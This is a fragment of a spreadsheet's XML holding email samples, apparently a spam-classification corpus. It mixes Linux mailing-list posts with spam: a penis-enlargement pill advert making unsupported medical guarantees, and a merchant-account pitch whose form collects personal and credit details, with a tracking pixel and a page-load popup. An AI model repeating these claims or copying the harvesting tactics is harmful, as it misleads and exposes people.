 &lt;img src="http://admanmail.com/server/v.asp?ad_key=BLNLUCTCHEAD" width="1" height="1" hspace="0" vspace="0" border="0" alt="T"&gt;
 &lt;hr size="1" noshade&gt;
 &lt;font face="Arial" size="1" color="#000000"&gt;
 You are receiving this mailing because you are a
 member of SendGreatOffers.com and subscribed as:JM@NETNOTEINC.COM
 To unsubscribe &lt;a href="http://admanmail.com/subscription.asp?em=JM@NETNOTEINC.COM&amp;l=SGO"&gt;
 &lt;font face="arial" size="1" color="#000000"&gt;Click Here&lt;/a&gt;
 (http://admanmail.com/subscription.asp?em=JM@NETNOTEINC.COM&amp;l=SGO)
 or reply to this email with REMOVE in the subject line - you must
 also include the body of this message to be unsubscribed. Any correspondence about
 the products/services should be directed to
 the company in the ad.
 %EM%JM@NETNOTEINC.COM%/EM%
 &lt;BR&gt;&lt;/font&gt; &lt;/body&gt; &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Improved Health                      AEGJNGKJGW
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;title&gt;GO BIG&lt;/title&gt;
 &lt;/head&gt;
 &lt;body onload=3D"window.open('http://www.100ideas.com','detail','width=3D77=
 5,height=3D475,resizable=3Dno,scrollbars=3Dyes,left=3D10,top=3D10')"&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"2" cellpadding=3D"0" cellspacing=3D"0" width=3D"546" bo=
 rdercolor=3D"#000000" bgcolor=3D"#FFFFFF" height=3D"90"&gt;
     &lt;tr&gt;
       &lt;td width=3D"544" height=3D"395"&gt;&lt;b&gt;&lt;font COLOR=3D"#5977bd" SIZE=3D"=
 +1" FACE=3D"Arial"&gt;&lt;img border=3D"0" src=3D"http://66.81.13.26/images/male=
 virility_words.jpg" width=3D"444" height=3D"42"&gt;&lt;br&gt;&lt;/font&gt;&lt;font color=3D"=
 #000080" SIZE=3D"+1" FACE=3D"Arial"&gt;GO
         BIG......SUPERSIZE TODAY!!!&lt;img border=3D"0" src=3D"http://66.81.1=
 3.26/images/bottle.jpg" align=3D"right" width=3D"141" height=3D"235"&gt;&lt;/fon=
 t&gt;&lt;/b&gt;&lt;font color=3D"#000080"&gt;&lt;font FACE=3D"Arial"&gt;&lt;br&gt;
         &lt;br&gt;
         ** &lt;/font&gt;&lt;/font&gt;&lt;font color=3D"#000080" face=3D"Arial" size=3D"3"=
 &gt;Do you want a larger and firmer penis?&lt;br&gt;
         ** Do you want to give your partner more pleasure?&lt;br&gt;
         ** Do you want to stay ROCK HARD longer?&lt;br&gt;
         ** Do you want PERMANENT results?&lt;br&gt;
         &lt;br&gt;
         Our Doctor-Approved Pill Will Enlarge Your Penis and improve your
         erection &amp;amp; your sexual desire!&lt;br&gt;100% GUARANTEED!&lt;br&gt;
         &lt;br&gt;
         Believe it or not, it is now possible for you to naturally boost y=
 our
         sexual desire and performance without a prescription! VP-RX is a s=
 afe
         and natural alternative to prescription drugs. If you suffer from
         erectile dysfunction or would just like to improve your sex drive =
 and
         sexual function, you owe it to yourself and your partner to take a
         closer look at VP-RX.&lt;br&gt;
         &lt;br&gt;
         To learn more about the benefits of VP-RX. &lt;a href=3D"http://www.1=
 00ideas.com"&gt;&lt;u&gt;Click
         Here&lt;/u&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"544" height=3D"88" bordercolor=3D"#FFFFFF"&gt;&lt;font color=3D=
 "#000080" size=3D"2" face=3D"Arial Narrow"&gt;This
         is a one time mailing.&amp;nbsp; You are receiving this information
         because your email address was subscribed to a list of people inte=
 rested
         in similar products. If you wish to unsubscribe to future informat=
 ion
         from this list, please submit a request to the following link &lt;a h=
 ref=3D"http://www.100ideas.com/remove/remove.html"&gt;UNSUBSCRIBE&lt;/a&gt;.&lt;/font&gt;=
 &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Vincent Cunniffe wrote:
 &gt; 
 &gt; Possibly. However, the amount of memory in use is stupid :
 &gt; 
 &gt; I start 50 threads, and the memory usage goes up to 411436 VSZ/840 RSS.
 &gt; 
 &gt; Then I stop those threads, and the usage stays there. I start another 50
 &gt; threads, and the usage goes up to 821036 VSZ/1040 RSS. So, it's neither
 &gt; freeing the resources correctly nor reusing them :-/
 &gt; 
 &gt; I've found several other people seeing the same VSZ issue with pthreads,
 &gt; spread over a long time, but no solution as yet.
 Err, Is your code fixed now?
 You need a seperate pthread_t per thread.
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Webdev] PHP/MySQL Virtual Hosting Recommendations?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I am looking at the options for a UNIX/Linux Virtual Server capable of holding multiple domains - preferably not tooo expensive as I am not a business. I wish to build a few PHP/MySQL sites and host them...
 A rough list of features I am after are
 Circa 50MB-100MB web space for now
 POP email accounts 
 Account Control Panel 
 Perl 
 PHP 
 MySQL 
 FTP and Telnet Access 24/7
 Own CGI-BIN
 Webalizer Graphical Stats 
 Server Side Includes 
 Good Reachable Technical Support
 I have seen a great looking 300MB solution in the region of 600Euro p.a. which at the moment is a bit over my financial head in one payment - I haven't completed any sites yet, but have a few potential jobs coming up.
 Any tips/pointers much appreciated!
 Regards,
 Elvin 
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: advice on 7.3.92 to 7.3.93, and Apt compiling
</t>
  </si>
  <si>
    <t xml:space="preserve">Any sage advice on the most painless way to upgrade from old limbo (.92) to new
 limbo (.93)?
 Apt for rpm from the 7.3 days barely works on Limbo1, and the package:
 apt-0.5.4cnc6-dwd2.src.rpm will not compile on the Libbo1 box (I was going to use
 that to dist-upgrade to Limbo2).
 Compile gave error on file "genpkglist.cc". First, it included "rpm/header.h" ok,
 but 2 other includes from that file (rpmio.h, hdrinline.h) could not be found. So I
 further patched the enviorment file to have "-I/usr/include/rpm".
 I guess that worked, but then I get this error (see below).
 Ohh... the pain. Any advice?
 Compiling genpkglist.cc (ed.)/rpm/BUILD/apt-0.5.4cnc6/obj/tools/genpkglist.o
 genpkglist.cc: In function `int main(int, char**)':
 genpkglist.cc:586: `rpmReadPackageHeader' undeclared (first use this function)
 genpkglist.cc:586: (Each undeclared identifier is reported only once for each
    function it appears in.)
 genpkglist.cc:604:33: macro "headerFree" requires 2 arguments, but only 1 given
 genpkglist.cc:604: `headerFree' undeclared (first use this function)
 genpkglist.cc:605:25: macro "headerFree" requires 2 arguments, but only 1 given
 make[2]: *** [(ed.)/rpm/BUILD/apt-0.5.4cnc6/obj/tools/genpkglist.o] Error 1
 make[1]: *** [all] Error 2
 make: *** [all] Error 2
 error: Bad exit status from (ed.)/tmp/rpm-tmp.18285 (%build)
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; On Wed, 24 Jul 2002, Patrick wrote:
 &gt; &gt;On Wed, 24 Jul 2002, rODbegbie wrote:
 &gt; &gt;
 &gt; &gt; &gt;rODbegbie wrote:
 &gt; &gt; &gt; &gt;I get the impression that Vipul &amp; co are deliberately trying to
 &gt; &gt; &gt; &gt;mislead users into downloading the dev code in order to get more
 &gt; &gt; &gt; &gt;unwitting test sites.
 &gt; &gt;
 &gt; &gt; &gt;Apologies to all.  In re-reading, that sentence sounds a lot harsher
 than I
 &gt; &gt; &gt;intended.
 &gt; &gt;
 &gt; &gt;The question I have is: what needs to be done/help needs to be provided
 to
 &gt; &gt;make the system suck less? It's obviously a great idea, it just needs
 some
 &gt; &gt;work...
 That's simple.  The same thing that any beta project needs to improve.
 Continuous
 End-User testing, constructive feedback, and suggestions on how to improve
 the
 system.  Upgrade each time a new beta version comes out, so everyone is
 testing
 on the same version of the code, and old bugs don't get reported as being in
 the
 new version, thus slowing down the debugging process.
 Report any installation issues, bugs, errors, etc., to the V2 beta list
 (http://lists.sourceforge.net/lists/listinfo/razor-testers) so that they can
 be quickly
 looked at, etc.  Provide detailed description of issues, include logs if
 possible,
 as well as any "captured" spam that generated the error(s).
 Thank you, please drive through,
 - AA -
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">At 11:43 PM 8/18/02 -0700, Rob Shavell wrote:
 &gt;sprint, if you haven't seen the marketing yet, is 1st to US market w/postwap
 &gt;mobile data svc.
 Small nitpick:  Sprint PCS wasn't really first to market with their high 
 speed data service.  Some would say they were actually last to market.  The 
 only thing that was first about this is what they're calling "nationwide 
 coverage", and you could even (and perhaps should) argue with that.
 &gt;   to me, there is nada more interesting and impactful going
 &gt;down in the tech world than mobile visual communications.. and yet no one
 &gt;seems to give much of a damn that right now that 2 persons can take photos
 &gt;and share them instantly across space.  this is one of the biggest - and
 &gt;last - fundamental changes in human communications.  will be as big as the
 &gt;browser.
 Can you clarify why you think this is so?
 I'm in the midst of an ongoing argument with a guy who works for me about 
 this very subject.  He, like you, thinks that things like MMS are going to 
 change the world.  I am not convinced.
 What exactly about sending pictures to each other is going to have such a 
 huge impact?  I'm waiting to be convinced.  I just don't see how it changes 
 human communication in any really amazing way - and no one who believes it 
 has yet done a good job explaining it to me.  I can understand SMS taking 
 off, since communicating short text messages can be very useful in many 
 situations.  However, I just don't see what's the compelling reason for 
 sending pictures around to each other on a regular basis.  Are there 
 instances when it makes sense?  Sure, I can think of plenty where it's a 
 nice to have, but very few where it would be a "man, I need this" type of 
 feature.
 I mean, right now, at my desk, it's easy for me to text message with lots 
 of people, and I do all the time.  If I wanted to, I could also very easily 
 snap a picture and send it to them, but I don't.  I did once, after I got a 
 really bad haircut, and a friend wanted to see how it looked - but that's a 
 fairly limited use.  Obviously, that's just one case, and maybe I'm just 
 too old (argh!) to really "get" this new photo taking and sharing stuff, 
 but I'm really trying to understand.
 So, I'm not saying it won't be a "fundamental change in human 
 communications", but I'd just like to know why you think it will be?
 Mike
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Top  Seed #574A
</t>
  </si>
  <si>
    <t xml:space="preserve">76AD
 This is a MIME Message
 ------=_NextPart_000_007F_01BDF6C7.FABAC1B0
 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0080_01BDF6C7.FABAC1B0"
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 ***** This is an HTML Message ! *****
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4=2E0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage=2EEditor=2EDocument"&gt;
 &lt;title&gt;FREE Computer With Merchant Account Setup&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;COMPLETE CREDIT CARD PROCESSING SYSTEMS FOR YOUR BUSINESS=2E INTERNE=
 T -  HOME
 BASED -  MAIL ORDER -  PHONE ORDER&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;Do you accept credit cards? Your competition does!&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Everyone Approved - Credit Problems OK!&lt;br&gt;
 Approval in less than 24 hours!&lt;br&gt;
 Increase your sales by 300%&lt;br&gt;
 Start Accepting Credit Cards on your website!&lt;br&gt;
 Free Information, No Risk, 100% confidential=2E&lt;br&gt;
 Your name and information will not be sold to third parties!&lt;br&gt;
 Home Businesses OK!  Phone/Mail Order OK!&lt;br&gt;
 No Application Fee, No Setup Fee!&lt;br&gt;
 Close More Impulse Sales!&lt;br&gt;
 &lt;br&gt;
 &lt;/p&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" cellspacing=3D"0" width=3D"85%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" size=3D"5" c=
 olor=3D"#CC0000"&gt;Everyone Approved!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Times New Roman"&gt; Good Credit or Bad!&amp;nbsp; To=
  apply today, please fill out
         the express form below=2E It
 contains all the information we need to get your account approved=2E For a=
 rea's
 that do not apply to you please put &amp;quot;n/a&amp;quot; in the box=2E&lt;br&gt;
 &lt;br&gt;
 Upon receipt, we'll fax you with all of the all Bank Card Application
 documents necessary to establish your Merchant Account=2E Once returned we=
  can
 have your account approved within 24 hours=2E&lt;br&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
         &lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;table border=3D"10" cols=3D"3" width=3D"385"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td align=3D"center" bgColor=3D"#990000" width=3D"119"&gt;&lt;b&gt;&lt;font colo=
 r=3D"#ffff00" face=3D"Arial,Helvetica" size=3D"3"&gt;Service&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"center" bgColor=3D"#990000" width=3D"160"&gt;&lt;b&gt;&lt;font colo=
 r=3D"#ffff00" face=3D"Arial,Helvetica" size=3D"3"&gt;Industry
         Standard&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"center" bgColor=3D"#990000" width=3D"66"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#ffff00" face=3D"Arial,Helve=
 tica" size=3D"3"&gt;US&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Site
         Inspection&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$50 - $75&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Shipping&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$50 - $75&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Warranty&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$10 Per Month=
 &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Sales
         Receipts&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$10 - $50&amp;nbs=
 p;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Fraud
         Screening&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;/center&gt;
     &lt;td align=3D"middle" width=3D"160"&gt;
       &lt;p align=3D"left"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;$=2E50 - $1=2E00&lt;/b&gt;&lt;br&gt;
       &lt;b&gt;Per Transaction&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
 &lt;center&gt;
 &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica" size=3D=
 "2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Amex Set
         Up&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$50 - $75&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;24 Hour&amp;nbsp;Help
         Line&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$10 Month&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Security
         Bond&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;$5000- $10,00=
 0&lt;/b&gt;&lt;br&gt;
         &lt;b&gt;Or More&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;NONE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;&lt;p&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" cellspacing=3D"0" width=3D"85%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p&gt;&lt;font face=3D"Arial,Helvetica" size=3D"2"&gt;&lt;b&gt;This is a &lt;font co=
 lor=3D"#3333ff"&gt;No
         Obligation Qualification Form&lt;/font&gt; and is your first step to&lt;fon=
 t color=3D"#cc0000"&gt;
         accepting credit cards=2E&lt;/font&gt; By filling out this form you will=
  &lt;font color=3D"#3333ff"&gt;&amp;quot;not
         enter&amp;quot;&lt;/font&gt; in to any &lt;font color=3D"#006600"&gt;obligations o=
 r
         contracts &lt;/font&gt;with us=2E We will use it to determine the best p=
 rogram
         to offer you based on the information you provide=2E You will be c=
 ontacted by one of our representatives within 1-2 business days to go over =
 the rest of your account set up=2E&lt;/b&gt;&lt;/font&gt;
         &lt;p align=3D"center"&gt;&lt;font face=3D"Arial,Helvetica" size=3D"2"&gt;&lt;b&gt;&lt;=
 font color=3D"#cc0000"&gt;Note:&lt;/font&gt;&amp;nbsp;
         All Information Provided To Us &lt;font color=3D"#cc0000"&gt;Will Remain=
  100%
         Confidential&lt;/font&gt;
         !!&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;table border=3D"0"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000099" face=3D"arial" size=
 =3D"+2"&gt;Apply
         Free With No Risk!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/form&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"95%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;i&gt;&lt;font size=3D"2" color=3D"#CC0000"&gt;Pleas=
 e fill out the
         express application form completely=2E&lt;br&gt;Incomplete information m=
 ay prevent us from properly
         processing your application=2E&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;form name=3D"form"
   method=3D"post"
   action=3D"mailto:wjlds@yahoo=2Ecom?SUBJECT=3DForm"
   enctype=3D"text/plain"
  &lt;tr&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"95%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Your Full Emai=
 l Address:&lt;/b&gt;&lt;br&gt;
         &lt;font color=3D"#ff0000"&gt;be sure to use your full address &lt;/font&gt;(i=
 =2Ee=2E&lt;font color=3D"#ff0000"&gt;
         &lt;/font&gt;user@domain=2Ecom)&lt;/font&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"user=
 _email" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Your Name:&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"Appl=
 icant_Name" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Business Name:=
 &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"Busi=
 ness_Name" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Business Phone=
  Number:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"Busi=
 ness_Phone" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Home Phone Num=
 ber:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"Home=
 Phone" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Type of Busine=
 ss:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%"&gt;
         &lt;div align=3D"left"&gt;
           &lt;table border=3D"0" width=3D"95%"&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"retail" name=3D"Type_Business"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Retail Business&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"mailorder" name=3D"Type_Business"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Mail Order Business&lt;/b=
 &gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"internet" name=3D"Type_Business"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Internet Based Busines=
 s&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Personal Credi=
 t Rating:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%"&gt;
         &lt;div align=3D"left"&gt;
           &lt;table border=3D"0" width=3D"95%"&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"excellent" name=3D"Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;Excellent&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"good" name=3D"Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;Good&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"fair" name=3D"Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;Fair&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"poor" name=3D"Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;Poor&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;How Soon Would=
  You Like a Merchant
         Account?&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%"&gt;
         &lt;p align=3D"center"&gt;&lt;input type=3D"text" name=3D"How_Soon" size=3D=
 "29"&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" colspan=3D"2"&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"0" width=3D"13%"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%"&gt;
                 &lt;p align=3D"center"&gt;&lt;input type=3D"submit" value=3D"Submit=
 " name=3D"B1"&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
       &lt;/td&gt;&lt;/form&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;&lt;br&gt;
